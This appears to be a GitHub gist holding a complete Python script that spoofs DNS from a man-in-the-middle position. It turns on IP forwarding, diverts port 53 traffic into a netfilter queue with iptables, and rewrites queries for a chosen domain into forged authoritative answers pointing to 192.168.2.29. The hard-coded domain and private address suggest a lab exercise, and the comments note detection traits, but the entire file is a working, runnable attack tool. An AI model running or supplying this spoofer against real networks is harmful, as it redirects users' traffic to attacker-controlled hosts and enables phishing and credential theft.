@BLTSEC
Created December 9, 2017 23:52
#!/usr/bin/env python3
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
def modify(packet):
    """NetfilterQueue callback: inspect one queued packet and issue a verdict.

    The queued payload is parsed with scapy as an IPv4 packet. When it carries
    a DNS question whose name contains ``domain``, the payload is replaced by
    a DNS response built from the query with source/destination addresses and
    ports swapped. Every packet that reaches the end of the function is
    accepted, rewritten or not.

    Traits of the rewritten response, as set below (useful when looking for
    this on the wire): QR and AA bits set, the query's transaction id and
    question echoed back, one answer record with a TTL of 10 and a fixed
    rdata value, and a source address equal to the resolver the client
    queried.

    NOTE(review): if payload parsing or the UTF-8 decode raises, the final
    accept() is not reached and this callback gives the packet no verdict.
    """
    domain = b'bltsec'
    # Raw bytes from the queue, parsed into scapy layers.
    parsed = IP(packet.get_payload())

    if parsed.haslayer(DNSQR):
        dns = parsed[DNS]
        qname = dns.qd.qname
        print(qname.decode('utf-8'))

        if domain in qname:
            print('It does have it***********************')
            # Addresses and ports are mirrored from the query so the payload
            # reads as a reply to the original sender.
            ip_part = IP(dst=parsed[IP].src, src=parsed[IP].dst)
            udp_part = UDP(dport=parsed[UDP].sport, sport=parsed[UDP].dport)
            answer = DNSRR(rrname=qname, ttl=10, rdata='192.168.2.29')
            dns_part = DNS(id=dns.id, qr=1, aa=1, qd=dns.qd, an=answer)
            # Swap the queued packet's content for the rebuilt one.
            packet.set_payload(bytes(ip_part / udp_part / dns_part))
            print('[+] Sent spoofed packet for %s' % domain)

    # Verdict for the packet, whether or not its payload was replaced.
    packet.accept()
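if __name__ == '__main__':
    # Host state touched by this script: the IPv4 forwarding sysctl and one
    # rule in the nat table's PREROUTING chain. Both are put back on exit.
    forward_sysctl = '/proc/sys/net/ipv4/ip_forward'
    # Same match for add and delete; only the chain operation (-A / -D) varies.
    queue_rule = 'iptables -t nat %s PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1'

    # Record the current forwarding setting so exit restores it instead of
    # forcing it to 0 (forwarding may already have been enabled on this host).
    with open(forward_sysctl) as file:
        previous_forward = file.read().strip()
    with open(forward_sysctl, 'w') as file:
        file.write('1')

    nfqueue = NetfilterQueue()
    rule_added = False
    bound = False
    try:
        rule_added = os.system(queue_rule % '-A') == 0
        if not rule_added:
            raise SystemExit('[-] iptables could not add the NFQUEUE rule')
        # 1 is the queue number named in the iptables rule; modify is the callback.
        nfqueue.bind(1, modify)
        bound = True
        print('[*] waiting for data...')
        nfqueue.run()
    except KeyboardInterrupt:
        print('\nExiting...')
    finally:
        # Cleanup runs on every exit path, not only on Ctrl-C, so a crash does
        # not leave forwarding enabled or the queue rule installed.
        if bound:
            nfqueue.unbind()
        # Delete only the rule added above. The earlier cleanup flushed the
        # filter and nat tables and deleted their user-defined chains, which
        # also removed any firewall rules the host already had.
        if rule_added:
            os.system(queue_rule % '-D')
        with open(forward_sysctl, 'w') as file:
            file.write(previous_forward)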